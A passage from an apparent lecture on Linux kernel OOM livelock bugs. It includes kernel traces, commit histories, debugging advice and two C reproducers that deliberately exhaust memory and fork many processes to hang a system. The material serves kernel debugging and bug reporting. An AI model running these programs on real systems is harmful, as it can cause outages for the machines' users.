trace_hardirqs_on_caller+0xf9/0x1c0 [ 1950.466355] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1950.469801] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1950.473158] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1950.477591] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1950.482185] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1950.486506] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1950.490796] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1950.495584] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1950.499804] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1950.504170] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1950.508832] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1950.513079] [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0 [ 1950.517235] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1950.521686] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1950.526006] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1950.530096] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1950.534389] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1950.539174] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1950.543411] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1950.547712] [<ffffffffa023d886>] xfs_vm_writepage+0x36/0x70 [xfs] [ 1950.552184] [<ffffffff8115e1df>] pageout.isra.43+0x18f/0x240 [ 1950.556493] [<ffffffff8115fa85>] shrink_page_list+0x725/0x950 [ 1950.560540] [<ffffffff811603a5>] shrink_inactive_list+0x205/0x490 [ 1950.564864] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1950.569394] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1950.573071] [<ffffffff81162165>] kswapd+0x445/0x830 [ 1950.576627] [<ffffffff81161d20>] ? mem_cgroup_shrink_node_zone+0xb0/0xb0 [ 1950.581585] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1950.585080] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1950.588837] [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230 (...snipped...) [ 1964.314371] MemAlloc: kworker/2:1(4484) flags=0x4208860 switches=48311 seq=15 gfp=0x2400000(GFP_NOIO) order=0 delay=838842 uninterruptible [ 1964.314373] kworker/2:1 D ffff88002d50b548 0 4484 2 0x00000080 [ 1964.314377] Workqueue: events_freezable_power_ disk_events_workfn [ 1964.314378] ffff88002d50b548 00000001001964d1 ffff88002a518100 ffff88002d5040c0 [ 1964.314379] ffff88002d50c000 ffff88002d50b580 ffff88003d690300 00000001001964d1 [ 1964.314380] 0000000000000002 ffff88002d50b560 ffffffff81621dea ffff88003d690300 [ 1964.314380] Call Trace: [ 1964.314382] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1964.314383] [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0 [ 1964.314384] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1964.314385] [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30 [ 1964.314386] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1964.314387] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1964.314389] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1964.314390] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1964.314391] [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80 [ 1964.314392] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1964.314393] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1964.314394] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1964.314395] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1964.314396] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1964.314397] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1964.314400] [<ffffffff811a6029>] ? kmem_cache_alloc_node+0x99/0x1d0 [ 1964.314402] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1964.314404] [<ffffffff812a3b2d>] ? bio_alloc_bioset+0x20d/0x2d0 [ 1964.314404] [<ffffffff812a4f14>] bio_copy_kern+0xc4/0x180 [ 1964.314405] [<ffffffff812aff00>] blk_rq_map_kern+0x70/0x130 [ 1964.314407] [<ffffffff8140f2ad>] scsi_execute+0x12d/0x160 [ 1964.314408] [<ffffffff8140f3d4>] scsi_execute_req_flags+0x84/0xf0 [ 1964.314412] [<ffffffffa01e0762>] sr_check_events+0xb2/0x2a0 [sr_mod] [ 1964.314414] [<ffffffffa01d4163>] cdrom_check_events+0x13/0x30 [cdrom] [ 1964.314415] [<ffffffffa01e0ba5>] sr_block_check_events+0x25/0x30 [sr_mod] [ 1964.314417] [<ffffffff812bb6db>] disk_check_events+0x5b/0x150 [ 1964.314418] [<ffffffff812bb7e7>] disk_events_workfn+0x17/0x20 [ 1964.314420] [<ffffffff8108e2f5>] process_one_work+0x1a5/0x400 [ 1964.314421] [<ffffffff8108e291>] ? process_one_work+0x141/0x400 [ 1964.314422] [<ffffffff8108e676>] worker_thread+0x126/0x490 [ 1964.314424] [<ffffffff8108e550>] ? process_one_work+0x400/0x400 [ 1964.314433] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1964.314435] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1964.314436] [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230 [ 1964.314503] Mem-Info: [ 1964.314507] active_anon:197951 inactive_anon:2919 isolated_anon:0 [ 1964.314507] active_file:585 inactive_file:1081 isolated_file:23 [ 1964.314507] unevictable:0 dirty:0 writeback:204 unstable:0 [ 1964.314507] slab_reclaimable:1715 slab_unreclaimable:10724 [ 1964.314507] mapped:1114 shmem:3239 pagetables:5438 bounce:0 [ 1964.314507] free:12237 free_pcp:73 free_cma:0 [ 1964.314512] Node 0 DMA free:4580kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:12kB inactive_file:20kB unevictable:0kB isolated(anon):0kB isolated(file):92kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:28kB mapped:12kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:716kB kernel_stack:368kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 1964.314514] lowmem_reserve[]: 0 936 936 936 [ 1964.314518] Node 0 DMA32 free:44368kB min:44320kB low:55400kB high:66480kB active_anon:783204kB inactive_anon:11676kB active_file:2328kB inactive_file:4304kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:788kB mapped:4444kB shmem:12948kB slab_reclaimable:6712kB slab_unreclaimable:42180kB kernel_stack:19552kB pagetables:21228kB unstable:0kB bounce:0kB free_pcp:292kB local_pcp:36kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 1964.314519] lowmem_reserve[]: 0 0 0 0 [ 1964.314526] Node 0 DMA: 37*4kB (U) 30*8kB (UM) 18*16kB (UM) 10*32kB (U) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4580kB [ 1964.314530] Node 0 DMA32: 1384*4kB (UE) 1000*8kB (UE) 669*16kB (UME) 335*32kB (UME) 113*64kB (UME) 17*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44368kB [ 1964.314532] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 1964.314532] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 1964.314533] 4943 total pagecache pages [ 1964.314534] 0 pages in swap cache [ 1964.314535] Swap cache stats: add 0, delete 0, find 0/0 [ 1964.314535] Free swap = 0kB [ 1964.314536] Total swap = 0kB [ 1964.314547] 262013 pages RAM [ 1964.314547] 0 pages HighMem/MovableOnly [ 1964.314548] 12770 pages reserved [ 1964.314548] 0 pages cma reserved [ 1964.314548] 0 pages hwpoisoned [ 1964.314549] Showing busy workqueues and worker pools: [ 1964.314572] workqueue events: flags=0x0 [ 1964.314617] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1964.314634] pending: vmw_fb_dirty_flush [vmwgfx] [ 1964.314673] workqueue events_power_efficient: flags=0x80 [ 1964.314703] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1964.314706] in-flight: 1882:fb_flashcursor [ 1964.314725] workqueue events_freezable_power_: flags=0x84 [ 1964.314744] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1964.314748] in-flight: 4484:disk_events_workfn [ 1964.314794] workqueue writeback: flags=0x4e [ 1964.314796] pwq 128: cpus=0-63 flags=0x4 nice=0 active=2/256 [ 1964.314799] in-flight: 73:wb_workfn wb_workfn [ 1964.315291] workqueue xfs-eofblocks/sda1: flags=0xc [ 1964.315314] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1964.315322] in-flight: 2125:xfs_eofblocks_worker [xfs] [ 1964.315336] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 2396 [ 1964.315395] pool 128: cpus=0-63 flags=0x4 nice=0 hung=0s workers=3 idle: 4706 6 (...snipped...) [ 1964.320659] MemAlloc-Info: stalling=114 dying=3 exiting=3 victim=0 oom_count=3275 ---------- Example output end ----------
Above output has messages from kmallocwd kernel thread. But since currently kmallocwd is not yet accepted, no messages will be printed when a system actually hit this situation (unless both /proc/sys/kernel/hung_task_timeout_secs and /proc/sys/kernel/hung_task_warnings are set to non-zero values).
I haven't got response about this problem from Michal Hocko, for Michal Hocko is too busy with OOM killer / OOM reaper related fixes. I asked when we will be able to start handling this problem, but since this problem has deep roots, it is difficult to answer estimated time.
Allocation requests for making free memory are allowed to allocate from memory reserves. Therefore, not only threads with TIF_MEMDIE flag set but also threads doing fs writeback operation can allocate from memory reserves. But since there is no means to limit amount of memory allocated from memory reserves, casually allocating from memory reserves results in depletion of memory reserves. As a result, when examining behavior of OOM situation, some behavior which is no problem under normal situation makes the situation worse under OOM situation.
This is an example that memory reserves are depleted due to memory allocation requests for fs writeback operation which occurs via normal memory allocation if OOM livelock situation occurs while writing to a file.
---------- oom-tester16.c ---------- #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sched.h> #include <sys/prctl.h> #include <signal.h> static char buffer[4096] = { }; static int file_io(void *unused) { const int fd = open(buffer, O_WRONLY | O_CREAT | O_APPEND, 0600); sleep(2); while (write(fd, buffer, sizeof(buffer)) > 0); close(fd); return 0; } int main(int argc, char *argv[]) { int i; if (chdir("/tmp")) return 1; for (i = 0; i < 64; i++) if (fork() == 0) { static cpu_set_t set = { { 1 } }; const int fd = open("/proc/self/oom_score_adj", O_WRONLY); write(fd, "1000", 4); close(fd); sched_setaffinity(0, sizeof(set), &set); snprintf(buffer, sizeof(buffer), "file_io.%02u", i); prctl(PR_SET_NAME, (unsigned long) buffer, 0, 0, 0); for (i = 0; i < 16; i++) clone(file_io, malloc(1024) + 1024, CLONE_VM, NULL); while (1) pause(); } { /* A dummy process for invoking the OOM killer. */ char *buf = NULL; unsigned long i; unsigned long size = 0; prctl(PR_SET_NAME, (unsigned long) "memeater", 0, 0, 0); for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } sleep(4); for (i = 0; i < size; i += 4096) buf[i] = '\0'; /* Will cause OOM due to overcommit */ } kill(-1, SIGKILL); return * (char *) NULL; /* Not reached. */ } ---------- oom-tester16.c ----------
---------- Example output start ---------- [ 59.562581] Mem-Info: [ 59.563935] active_anon:289393 inactive_anon:2093 isolated_anon:29 [ 59.563935] active_file:10838 inactive_file:113013 isolated_file:859 [ 59.563935] unevictable:0 dirty:108531 writeback:5308 unstable:0 [ 59.563935] slab_reclaimable:5526 slab_unreclaimable:7077 [ 59.563935] mapped:9970 shmem:2159 pagetables:2387 bounce:0 [ 59.563935] free:3042 free_pcp:0 free_cma:0 [ 59.574558] Node 0 DMA free:6968kB min:44kB low:52kB high:64kB active_anon:6056kB inactive_anon:176kB active_file:712kB inactive_file:744kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:756kB writeback:0kB mapped:736kB shmem:184kB slab_reclaimable:48kB slab_unreclaimable:208kB kernel_stack:160kB pagetables:144kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:9708 all_unreclaimable? yes [ 59.585464] lowmem_reserve[]: 0 1732 1732 1732 [ 59.587123] Node 0 DMA32 free:5200kB min:5200kB low:6500kB high:7800kB active_anon:1151516kB inactive_anon:8196kB active_file:42640kB inactive_file:451076kB unevictable:0kB isolated(anon):116kB isolated(file):3564kB present:2080640kB managed:1775332kB mlocked:0kB dirty:433368kB writeback:21232kB mapped:39144kB shmem:8452kB slab_reclaimable:22056kB slab_unreclaimable:28100kB kernel_stack:20976kB pagetables:9404kB unstable:0kB bounce:0kB free_pcp:120kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2701604 all_unreclaimable? no [ 59.599649] lowmem_reserve[]: 0 0 0 0 [ 59.601431] Node 0 DMA: 25*4kB (UME) 16*8kB (UME) 3*16kB (UE) 5*32kB (UME) 2*64kB (UM) 2*128kB (ME) 2*256kB (ME) 1*512kB (E) 1*1024kB (E) 2*2048kB (ME) 0*4096kB = 6964kB [ 59.606509] Node 0 DMA32: 925*4kB (UME) 140*8kB (UME) 5*16kB (ME) 5*32kB (M) 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 5060kB [ 59.610415] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 59.612879] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 59.615308] 126847 total pagecache pages [ 59.616921] 0 pages in swap cache [ 59.618475] Swap cache stats: add 0, delete 0, find 0/0 [ 59.620268] Free swap = 0kB [ 59.621650] Total swap = 0kB [ 59.623011] 524157 pages RAM [ 59.624365] 0 pages HighMem/MovableOnly [ 59.625893] 76348 pages reserved [ 59.627506] 0 pages hwpoisoned [ 59.628838] Out of memory: Kill process 4450 (file_io.00) score 998 or sacrifice child [ 59.631071] Killed process 4450 (file_io.00) total-vm:4308kB, anon-rss:100kB, file-rss:1184kB, shmem-rss:0kB [ 61.526353] kthreadd: page allocation failure: order:0, mode:0x2200020 [ 61.527976] file_io.00: page allocation failure: order:0, mode:0x2200020 [ 61.527978] CPU: 0 PID: 4457 Comm: file_io.00 Not tainted 4.5.0-rc7+ #45 [ 61.527979] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 61.527981] 0000000000000086 000000000005bb2d ffff88006cc5b588 ffffffff812a4d65 [ 61.527982] 0000000002200020 0000000000000000 ffff88006cc5b618 ffffffff81106dc7 [ 61.527983] 0000000000000000 ffffffffffffffff 00ff880000000000 ffff880000000004 [ 61.527983] Call Trace: [ 61.528009] [<ffffffff812a4d65>] dump_stack+0x4d/0x68 [ 61.528012] [<ffffffff81106dc7>] warn_alloc_failed+0xf7/0x150 [ 61.528014] [<ffffffff81109e3f>] __alloc_pages_nodemask+0x23f/0xa60 [ 61.528016] [<ffffffff81137770>] ? page_check_address_transhuge+0x350/0x350 [ 61.528018] [<ffffffff8111327d>] ? page_evictable+0xd/0x40 [ 61.528019] [<ffffffff8114d927>] alloc_pages_current+0x87/0x110 [ 61.528021] [<ffffffff81155181>] new_slab+0x3a1/0x440 [ 61.528023] [<ffffffff81156fdf>] ___slab_alloc+0x3cf/0x590 [ 61.528024] [<ffffffff811a0999>] ? wb_start_writeback+0x39/0x90 [ 61.528027] [<ffffffff815a7f68>] ? preempt_schedule_common+0x1f/0x37 [ 61.528028] [<ffffffff815a7f9f>] ? preempt_schedule+0x1f/0x30 [ 61.528030] [<ffffffff81001012>] ? ___preempt_schedule+0x12/0x14 [ 61.528030] [<ffffffff811a0999>] ? wb_start_writeback+0x39/0x90 [ 61.528032] [<ffffffff81175536>] __slab_alloc.isra.64+0x18/0x1d [ 61.528033] [<ffffffff8115778c>] kmem_cache_alloc+0x11c/0x150 [ 61.528034] [<ffffffff811a0999>] wb_start_writeback+0x39/0x90 [ 61.528035] [<ffffffff811a0d9f>] wakeup_flusher_threads+0x7f/0xf0 [ 61.528036] [<ffffffff81115ac9>] do_try_to_free_pages+0x1f9/0x410 [ 61.528037] [<ffffffff81115d74>] try_to_free_pages+0x94/0xc0 [ 61.528038] [<ffffffff8110a166>] __alloc_pages_nodemask+0x566/0xa60 [ 61.528040] [<ffffffff81200878>] ? xfs_bmapi_read+0x208/0x2f0 [ 61.528041] [<ffffffff8114d927>] alloc_pages_current+0x87/0x110 [ 61.528042] [<ffffffff8110092f>] __page_cache_alloc+0xaf/0xc0 [ 61.528043] [<ffffffff811011e8>] pagecache_get_page+0x88/0x260 [ 61.528044] [<ffffffff81101d31>] grab_cache_page_write_begin+0x21/0x40 [ 61.528046] [<ffffffff81222c9f>] xfs_vm_write_begin+0x2f/0xf0 [ 61.528047] [<ffffffff810b14be>] ? current_fs_time+0x1e/0x30 [ 61.528048] [<ffffffff81101eca>] generic_perform_write+0xca/0x1c0 [ 61.528050] [<ffffffff8107c390>] ? wake_up_process+0x10/0x20 [ 61.528051] [<ffffffff8122e01c>] xfs_file_buffered_aio_write+0xcc/0x1f0 [ 61.528052] [<ffffffff81079037>] ? finish_task_switch+0x77/0x280 [ 61.528053] [<ffffffff8122e1c4>] xfs_file_write_iter+0x84/0x140 [ 61.528054] [<ffffffff811777a7>] __vfs_write+0xc7/0x100 [ 61.528055] [<ffffffff811784cd>] vfs_write+0x9d/0x190 [ 61.528056] [<ffffffff810010a1>] ? do_audit_syscall_entry+0x61/0x70 [ 61.528057] [<ffffffff811793c0>] SyS_write+0x50/0xc0 [ 61.528059] [<ffffffff815ab4d7>] entry_SYSCALL_64_fastpath+0x12/0x6a [ 61.528059] Mem-Info: [ 61.528062] active_anon:293335 inactive_anon:2093 isolated_anon:0 [ 61.528062] active_file:10829 inactive_file:110045 isolated_file:32 [ 61.528062] unevictable:0 dirty:109275 writeback:822 unstable:0 [ 61.528062] slab_reclaimable:5489 slab_unreclaimable:10070 [ 61.528062] mapped:9999 shmem:2159 pagetables:2420 bounce:0 [ 61.528062] free:3 free_pcp:0 free_cma:0 [ 61.528065] Node 0 DMA free:12kB min:44kB low:52kB high:64kB active_anon:6060kB inactive_anon:176kB active_file:708kB inactive_file:756kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:756kB writeback:0kB mapped:736kB shmem:184kB slab_reclaimable:48kB slab_unreclaimable:7160kB kernel_stack:160kB pagetables:144kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:9844 all_unreclaimable? yes [ 61.528066] lowmem_reserve[]: 0 1732 1732 1732 [ 61.528068] Node 0 DMA32 free:0kB min:5200kB low:6500kB high:7800kB active_anon:1167280kB inactive_anon:8196kB active_file:42608kB inactive_file:439424kB unevictable:0kB isolated(anon):0kB isolated(file):128kB present:2080640kB managed:1775332kB mlocked:0kB dirty:436344kB writeback:3288kB mapped:39260kB shmem:8452kB slab_reclaimable:21908kB slab_unreclaimable:33120kB kernel_stack:20976kB pagetables:9536kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:11073180 all_unreclaimable? yes [ 61.528069] lowmem_reserve[]: 0 0 0 0 [ 61.528072] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 61.528074] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 61.528075] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 61.528075] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 61.528076] 123086 total pagecache pages [ 61.528076] 0 pages in swap cache [ 61.528077] Swap cache stats: add 0, delete 0, find 0/0 [ 61.528077] Free swap = 0kB [ 61.528077] Total swap = 0kB [ 61.528077] 524157 pages RAM [ 61.528078] 0 pages HighMem/MovableOnly [ 61.528078] 76348 pages reserved [ 61.528078] 0 pages hwpoisoned [ 61.528079] SLUB: Unable to allocate memory on node -1 (gfp=0x2088020) [ 61.528080] cache: kmalloc-64, object size: 64, buffer size: 64, default order: 0, min order: 0 [ 61.528080] node 0: slabs: 3218, objs: 205952, free: 0 [ 61.528085] file_io.00: page allocation failure: order:0, mode:0x2200020 [ 61.528086] CPU: 0 PID: 4457 Comm: file_io.00 Not tainted 4.5.0-rc7+ #45 ---------- Example output end ----------
Although an interim fix, for now we made sure that we do not deplete memory reserves by commit 78ebc2f7146156f4 ("mm,writeback: don't use memory reserves for wb_start_writeback").
It was lucky that this problem was found before the OOM reaper is accepted, for, if the OOM reaper prevented the OOM livelock situation from occurring, we cannot reproduce this problem, and this problem is considered as non-existent. Regarding problems caused by Linux kernel's memory management subsystem, since identifying criminal person and turning over by yourself is especially strongly required, we can't expect addressing unreproducible problems.
There was a bug in down_write_killable() operation, which was introduced in order to reduce possibility for the OOM reaper to fail to reclaim memory, which is a variant of down_write() that can be interrupted by SIGKILL signal, and resulted in OOM livelock situation. Nobody has noticed this bug for one month after the patch was accepted to linux-next which was (as of that moment) a development version towards Linux 4.7-rc1. (Once again, the OOM situation is not tested that enough.)
---------- torture6.c ---------- #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <signal.h> #include <poll.h> #include <sched.h> #include <sys/prctl.h> #include <sys/wait.h> static int memory_eater(void *unused) { char *buf = NULL; unsigned long size = 0; while (1) { char *tmp = realloc(buf, size + 4096); if (!tmp) break; buf = tmp; buf[size] = 0; size += 4096; size %= 1048576; } kill(getpid(), SIGKILL); return 0; } static void child(void) { char *stack = malloc(4096 * 2); char from[128] = { }; char to[128] = { }; const pid_t pid = getpid(); unsigned char prev = 0; int fd = open("/proc/self/oom_score_adj", O_WRONLY); write(fd, "1000", 4); close(fd); snprintf(from, sizeof(from), "tgid=%u", pid); prctl(PR_SET_NAME, (unsigned long) from, 0, 0, 0); srand(pid); snprintf(from, sizeof(from), "file.%u-0", pid); fd = open(from, O_WRONLY | O_CREAT, 0600); if (fd == EOF) _exit(1); if (clone(memory_eater, stack + 4096, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1) _exit(1); while (1) { const unsigned char next = rand(); snprintf(from, sizeof(from), "file.%u-%u", pid, prev); snprintf(to, sizeof(to), "file.%u-%u", pid, next); prev = next; rename(from, to); write(fd, "", 1); } _exit(0); } int main(int argc, char *argv[]) { if (chdir("/tmp")) return 1; if (fork() == 0) { char *buf = NULL; unsigned long size; unsigned long i; for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } /* Will cause OOM due to overcommit */ for (i = 0; i < size; i += 4096) buf[i] = 0; while (1) pause(); } else { int children = 1024; while (1) { while (children > 0) { switch (fork()) { case 0: child(); case -1: sleep(1); break; default: children--; } } wait(NULL); children++; } } return 0; } ---------- torture6.c ----------
This bug was fixed by commit 04cafed7fc19a801 ("locking/rwsem: Fix down_write_killable()").
Since swapping out is considered as an operation for making free memory, allocation requests for performing swap out operation are allowed to allocate memory from memory reserves.
Linux 4.6 and later kernels include commit f9054c70d28bc214 ("mm, mempool: only set __GFP_NOMEMALLOC if there are free elements") in order to prevent threads with TIF_MEMDIE flag set from being blocked forever inside mempool_alloc(). But this patch was not prepared for being called from memory reclaim operations. As a result, the system became unresponsibive due to depletion of memory reserves because dm-crypt allocates memory for encrypting data which are supposed to be swapped out in order to make free memory when dm-crypto is used for swap device.
Since the OOM reaper was added in Linux 4.6, and currently we are trying to prove that the OOM livelock situation cannot occur as long as the OOM killer can be invoked, this patch was reverted by commit 4e390b2b2f34b8da ("Revert "mm, mempool: only set __GFP_NOMEMALLOC if there are free elements"").
The possibility of hanging up the system when the OOM killer was able to be invoked has been reduced. But the possibility of hanging up the system without invoking the OOM killer still remains. Therefore, my conclusion from this experience is that user's expectation that "The OOM killer is invoked in order to solve out of memory situation when the system entered into out of memory situation." is currently an illusion.
Many years ago, since when SELinux became enforcing mode by default, there was a tendency that "suspect SELinux when something went wrong with application's behavior".
When SELinux is the cause, we can try whether the problem is solved by disabling SELinux. But when the behavior of memory management subsystem under out of memory is the cause, we cannot try whether the problem is solved by not using the memory management subsystem.
Since the behavior of memory management subsystem under out of memory depends on system configuration/usage and timing, it is impossible to test all possibilities at development stage. We need to get feedback when a problem occurred in the end user's environment. But since the memory management subsystem does not allow users to tell that "something unexpected situation is occurring" (in other words, there is no mechanism for proving that the memory management subsystem is innocent), it is impossible to suspect the memory management subsystem. Let alone getting feedback from the end users.
I'm sorry for system administrators and technical staff at support center who are bothered by system hangups, but the situation encountering unsolvable challenges in the CTF games will last for the meantime.
It seems that the memory management subsystem in the Linux kernel is a mass of optimism and heuristics. Never swallow comments in the source code and/or change logs. Suspect, suspect and suspect. What are preconditions? How worst situation is the code prepared for? There is no shortage of suspect.
The "too small to fail" memory-allocation rule still exists. Also, there are "not too small" problems which cannot fail. In this lecture, you glimpsed the dark side of Linux kernel's memory management. Why don't you challenge these horribly difficult problems?
In the LSF/MM summit held this April, it seems that there was a discussion about an overhaul of GFP flags (which is the cause of impossible to win games). Since I am neither a memory management person nor a filesystem development person, I do not understand details of the discussion (i.e. behavior inside respective subsystems). But it seems to me that the discussion is revealing how poorly knowledge is shared between the provider side and the user side. It is pity that workarounds which can be backported to older kernels are completely ignored, but the Linux kernel developer's community has started some challenge.
In the real world, I feel that rigid organizations are becoming more and more failing to think about other divisions. Even within the same division, I feel that "That is not my role!" attitude is spreading as an excuse for ducking issues. As if to add insult to injury, in the name of security, I feel that the trend in the direction of forbidding even share/think about problems as organizations is getting stronger.
I believe that, like filesystem developers and memory management developers started discussions for solving problems, we need to provide mental space for communication without constraint in the real world. My way is that, not for getting a favorable settlement on daily negotiations, but for solving years-standing problems, "think various possibilities" (a bit of imagination and attentiveness) moves things forwards.
Regarding Linux systems running as a guest of virtualized environments (e.g. KVM and VMware), you can obtain memory dump of that guest using hypervisor's functionality. Since taking memory dump does not involve kernel panic, you can obtain multiple memory dumps, and check how situation changed over time. Therefore, when your Linux guest system hung up, you can increase possibility of solving problems by taking guest's memory dump for multiple times before rebooting the guest.
Linux kernel does not print any messages when a hang up caused by behavior of memory management subsystem. Therefore, you need to obtain information using e.g. memory dumps and/or SysRq.
By configuring serial console and/or netconsole, you can check memory usage. If free: is below min:, OOM livelock situation is suspected.
By configuring serial console and/or netconsole, you can check threads doing memory allocation. If there are many threads reporting "__alloc_pages_nodemask" line, OOM livelock situation is suspected.
Since the default value of /proc/sys/kernel/hung_task_warnings is 10, it is common that the value drops to 0 before actual problems occurs and fails to capture messages when an actual problem occurred.
Some watchdogs allow configuring the action to take upon timeout. You can increase possibility of solving problems by taking kdump before reboot when your system hung up.
Like I wrote in a serial OSS column: To invite peaceful night (written in Japanese), I think that whether you prepared and practiced before you encounter problems makes the big difference.